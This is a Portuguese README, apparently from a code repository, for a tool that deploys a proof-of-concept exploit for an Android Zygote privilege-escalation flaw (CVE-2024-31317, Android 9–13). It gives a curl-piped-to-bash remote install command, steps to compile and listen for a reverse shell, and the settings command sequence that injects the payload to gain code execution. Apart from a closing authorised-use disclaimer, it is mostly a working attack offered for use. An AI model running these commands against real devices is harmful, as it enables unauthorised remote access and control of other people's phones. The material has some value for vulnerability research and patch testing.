
Ferramenta de implantação automatizada para o exploit PoC CVE-2024-31317 direcionado ao Android 9-13. Gera payloads de shell reverso e configura escalonamento de privilégios via injeção de processo Zygote para testes de segurança autorizados.
Uma ferramenta de implantação para o exploit de prova de conceito CVE-2024-31317, voltada para dispositivos Android 9 a 13.
O CVE-2024-31317-PoC-Deployer é um script de implantação automatizado usado para gerar e configurar rapidamente todos os arquivos necessários para a exploração da vulnerabilidade CVE-2024-31317. Essa vulnerabilidade afeta dispositivos Android 9 a 13, permitindo elevação de privilégios e execução de código arbitrário através do processo Zygote.
reverse_shell.c - Programa de shell reverso implementado em Cpayload.txt - Payload de exploração especialmente construídocompile.sh - Script de compilação automáticaREADME.txt - Instruções detalhadas de usoCVE-2024-31317.txt - Documento de análise técnica da vulnerabilidadeExecutar o script de implantação remota:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
Compilar o shell reverso:
sh compile.sh
Executar o listener do shell reverso:
sh reverse_shell
payload.txt para /data/local/tmp/ no dispositivo alvoxxx.xxx.xxx no payload.txt pelo IP do seu servidor de escutaam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
Esta ferramenta destina-se apenas a fins legítimos de teste de segurança e pesquisa. A autorização explícita do sistema alvo deve ser obtida antes do uso. O uso não autorizado pode violar a lei. O desenvolvedor não se responsabiliza por qualquer uso indevido.
Este projeto está licenciado sob a licença MIT - consulte o arquivo LICENSE para mais detalhes.